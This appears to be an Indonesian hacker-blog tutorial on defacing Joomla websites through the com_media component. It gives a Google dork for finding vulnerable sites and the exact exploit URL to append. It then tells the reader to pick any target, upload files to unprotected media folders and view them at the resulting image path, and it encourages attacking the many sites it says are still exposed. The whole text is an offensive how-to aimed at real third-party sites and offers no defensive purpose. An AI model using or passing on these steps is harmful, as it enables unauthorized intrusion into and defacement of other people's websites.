Assalamualaikum mas mbah ^_^
Sekarang lanjut ke tutorial selanjutnya "Tutorial Deface Dengan Com_Media" sebenarnya exploit ini bisa disebut exploit jadul , soalnya ini exploit sudah lama sekali :D .
Tapi exploit nya masih joss kok . masih bnyak yg perawan :D
Langsung aja yah :D .
Dork : "inurl:com_media" (tanpa kutip , kembangin lagi yah itu cuman dork default :) )
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Gunakan dorknya dulu dengan menggunakan mesin pencaharian google :D .
Pilih salah satu target :D
Klau udah dapat contoh kyak gini .
www.site.com/
Masukkan exploit yang di atas tadi :D , jadinya nanti kyak gini
www.site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Kalau vuln nanti gambarnya kek gini Mas dan Mbah :D
Tinggal Upload deh file mu :D
Note: file yang bisa diupload berextensi .txt .jpg .gif .png, Untuk html dan php tidak bisa.
Selesai Path Uploadnya Disini > www.site.com/images/file/nama.txt
Gitu aja mudahkan.? , Langsung hjar master dan jgn lupa tetap enjoy :D
Waasalamualaikum ^_^
Thanks To : PhantomGhost - Sulawesi IT Sec
Source Images : https://sulawesi-itsecurity.blogspot.co.id/